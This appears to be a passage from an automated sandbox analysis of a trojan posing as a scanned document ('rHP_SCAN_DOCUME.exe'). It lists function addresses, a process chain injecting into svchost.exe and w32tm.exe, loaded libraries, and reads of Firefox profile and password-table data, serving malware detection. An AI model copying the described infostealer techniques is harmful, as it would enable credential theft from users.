Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BEFA0	2_2_038BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03832FC8	2_2_03832FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384CFE0	2_2_0384CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03882F28	2_2_03882F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03860F30	2_2_03860F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E2F30	2_2_038E2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B4F40	2_2_038B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03852E90	2_2_03852E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FCE93	2_2_038FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FEEDB	2_2_038FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FEE26	2_2_038FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840E59	2_2_03840E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03858DBF	2_2_03858DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383ADE0	2_2_0383ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384AD00	2_2_0384AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DCD1F	2_2_038DCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0CB5	2_2_038E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03830CF2	2_2_03830CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840C00	2_2_03840C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0388739A	2_2_0388739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F132D	2_2_038F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382D34C	2_2_0382D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038452A0	2_2_038452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385B2C0	2_2_0385B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E12ED	2_2_038E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384B1B0	2_2_0384B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0387516C	2_2_0387516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382F172	2_2_0382F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0390B16B	2_2_0390B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038EF0CC	2_2_038EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038470C0	2_2_038470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F70E9	2_2_038F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FF0E0	2_2_038FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FF7B0	2_2_038FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F16CC	2_2_038F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03885630	2_2_03885630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DD5B0	2_2_038DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039095C3	2_2_039095C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F7571	2_2_038F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FF43F	2_2_038FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03831460	2_2_03831460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385FB80	2_2_0385FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B5BF0	2_2_038B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0387DBF9	2_2_0387DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FFB76	2_2_038FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DDAAC	2_2_038DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03885AA0	2_2_03885AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E1AA3	2_2_038E1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038EDAC6	2_2_038EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FFA49	2_2_038FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F7A46	2_2_038F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B3A6C	2_2_038B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D5910	2_2_038D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03849950	2_2_03849950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385B950	2_2_0385B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038438E0	2_2_038438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AD800	2_2_038AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03841F92	2_2_03841F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FFFB1	2_2_038FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03803FD2	2_2_03803FD2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03803FD5	2_2_03803FD5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FFF09	2_2_038FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03849EB0	2_2_03849EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385FDC0	2_2_0385FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03843D40	2_2_03843D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F1D5A	2_2_038F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F7D73	2_2_038F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FFCF2	2_2_038FFCF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B9C32	2_2_038B9C32
Source: C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe	Code function: 3_2_039F9030	3_2_039F9030
Source: C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe	Code function: 3_2_039F8FDB	3_2_039F8FDB
Source: C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe	Code function: 3_2_039F8FE7	3_2_039F8FE7
Source: C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe	Code function: 3_2_039F8E97	3_2_039F8E97
Source: C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe	Code function: 3_2_039FAEB7	3_2_039FAEB7
Source: C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe	Code function: 3_2_03A016F2	3_2_03A016F2
Source: C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe	Code function: 3_2_03A016F7	3_2_03A016F7
Source: C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe	Code function: 3_2_039FAC97	3_2_039FAC97
Source: C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe	Code function: 3_2_03A19CB7	3_2_03A19CB7
Source: C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe	Code function: 3_2_03A034F7	3_2_03A034F7
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_0365A352	4_2_0365A352
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_036603E6	4_2_036603E6
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035AE3F0	4_2_035AE3F0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_03640274	4_2_03640274
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_036202C0	4_2_036202C0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_03628158	4_2_03628158
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_03590100	4_2_03590100
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_0363A118	4_2_0363A118
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_036581CC	4_2_036581CC
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_036541A2	4_2_036541A2
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_036601AA	4_2_036601AA
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_03632000	4_2_03632000
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035C4750	4_2_035C4750
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035A0770	4_2_035A0770
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_0359C7C0	4_2_0359C7C0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035BC6E0	4_2_035BC6E0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035A0535	4_2_035A0535
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_03660591	4_2_03660591
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_03652446	4_2_03652446
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_03644420	4_2_03644420
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_0364E4F6	4_2_0364E4F6
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_0365AB40	4_2_0365AB40
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_03656BD7	4_2_03656BD7
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_0359EA80	4_2_0359EA80
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035B6962	4_2_035B6962
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_0366A9A6	4_2_0366A9A6
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035A29A0	4_2_035A29A0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035A2840	4_2_035A2840
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035AA840	4_2_035AA840
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035CE8F0	4_2_035CE8F0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035868B8	4_2_035868B8
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_03614F40	4_2_03614F40
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_03642F30	4_2_03642F30
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035C0F30	4_2_035C0F30
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035E2F28	4_2_035E2F28
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_03592FC8	4_2_03592FC8
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035ACFE0	4_2_035ACFE0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_0361EFA0	4_2_0361EFA0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035A0E59	4_2_035A0E59
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_0365EE26	4_2_0365EE26
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_0365EEDB	4_2_0365EEDB
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035B2E90	4_2_035B2E90
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_0365CE93	4_2_0365CE93
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035AAD00	4_2_035AAD00
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_0363CD1F	4_2_0363CD1F
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_0359ADE0	4_2_0359ADE0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035B8DBF	4_2_035B8DBF
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035A0C00	4_2_035A0C00
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_03590CF2	4_2_03590CF2
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_03640CB5	4_2_03640CB5
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_0358D34C	4_2_0358D34C
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_0365132D	4_2_0365132D
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035E739A	4_2_035E739A
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_036412ED	4_2_036412ED
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035BB2C0	4_2_035BB2C0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035A52A0	4_2_035A52A0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_0366B16B	4_2_0366B16B
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_0358F172	4_2_0358F172
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035D516C	4_2_035D516C
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035AB1B0	4_2_035AB1B0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_0365F0E0	4_2_0365F0E0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_036570E9	4_2_036570E9
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035A70C0	4_2_035A70C0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_0364F0CC	4_2_0364F0CC
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_0365F7B0	4_2_0365F7B0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035E5630	4_2_035E5630
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_036516CC	4_2_036516CC
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_03657571	4_2_03657571
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_036695C3	4_2_036695C3
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_0363D5B0	4_2_0363D5B0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_03591460	4_2_03591460
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_0365F43F	4_2_0365F43F
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_0365FB76	4_2_0365FB76
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_03615BF0	4_2_03615BF0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035DDBF9	4_2_035DDBF9
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035BFB80	4_2_035BFB80
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_03613A6C	4_2_03613A6C
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_03657A46	4_2_03657A46
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_0365FA49	4_2_0365FA49
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_0364DAC6	4_2_0364DAC6
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_03641AA3	4_2_03641AA3
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_0363DAAC	4_2_0363DAAC
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035E5AA0	4_2_035E5AA0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035A9950	4_2_035A9950
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035BB950	4_2_035BB950
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_03635910	4_2_03635910
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_0360D800	4_2_0360D800
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035A38E0	4_2_035A38E0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_0365FF09	4_2_0365FF09
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_03563FD5	4_2_03563FD5
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_03563FD2	4_2_03563FD2
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035A1F92	4_2_035A1F92
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_0365FFB1	4_2_0365FFB1
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035A9EB0	4_2_035A9EB0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_03657D73	4_2_03657D73
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035A3D40	4_2_035A3D40
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_03651D5A	4_2_03651D5A
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035BFDC0	4_2_035BFDC0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_03619C32	4_2_03619C32
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_0365FCF2	4_2_0365FCF2
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_02E72180	4_2_02E72180
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_02E8C010	4_2_02E8C010
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_02E6CFF0	4_2_02E6CFF0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_02E6D210	4_2_02E6D210
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_02E6B389	4_2_02E6B389
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_02E6B340	4_2_02E6B340
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_02E6B334	4_2_02E6B334
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_02E6B1F0	4_2_02E6B1F0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_02E73A4B	4_2_02E73A4B
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_02E73A50	4_2_02E73A50
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_02E75850	4_2_02E75850
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_0347E384	4_2_0347E384
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_0347E268	4_2_0347E268
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_0347E721	4_2_0347E721
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_0347D7E8	4_2_0347D7E8

Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Code function: String function: 00830A30 appears 46 times
Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Code function: String function: 00819CB3 appears 31 times
Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Code function: String function: 0082F9F2 appears 40 times
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: String function: 0360EA12 appears 86 times
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: String function: 0358B970 appears 280 times
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: String function: 035D5130 appears 58 times
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: String function: 0361F290 appears 105 times
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: String function: 035E7E54 appears 111 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03887E54 appears 111 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0382B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 038AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 038BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03875130 appears 58 times

Source: rHP_SCAN_DOCUME.exe, 00000000.00000003.1456439679.0000000003943000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs rHP_SCAN_DOCUME.exe
Source: rHP_SCAN_DOCUME.exe, 00000000.00000003.1457815412.0000000003AED000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs rHP_SCAN_DOCUME.exe

Source: rHP_SCAN_DOCUME.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/2@17/12

Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe

Code function: 0_2_008837B5 GetLastError,FormatMessageW,

0_2_008837B5

Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Code function: 0_2_008710BF AdjustTokenPrivileges,CloseHandle,		0_2_008710BF
Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Code function: 0_2_008716C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_008716C3

Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe

Code function: 0_2_008851CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_008851CD

Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe

Code function: 0_2_0089A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_0089A67C

Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe

Code function: 0_2_0088648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,

0_2_0088648E

Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe

Code function: 0_2_008142A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_008142A2

Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe

File created: C:\Users\user\AppData\Local\Temp\fricandeaux

Jump to behavior

Source: rHP_SCAN_DOCUME.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: w32tm.exe, 00000004.00000002.3911116744.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000004.00000003.1831458388.0000000002FD6000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000004.00000002.3911116744.0000000002FD6000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000004.00000003.1831458388.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: rHP_SCAN_DOCUME.exe	Virustotal: Detection: 30%
Source: rHP_SCAN_DOCUME.exe	ReversingLabs: Detection: 36%

Source: unknown	Process created: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe "C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe"
Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe"
Source: C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe	Process created: C:\Windows\SysWOW64\w32tm.exe "C:\Windows\SysWOW64\w32tm.exe"
Source: C:\Windows\SysWOW64\w32tm.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe"	Jump to behavior
Source: C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe	Process created: C:\Windows\SysWOW64\w32tm.exe "C:\Windows\SysWOW64\w32tm.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Section loaded: winsqlite3.dll	Jump to behavior
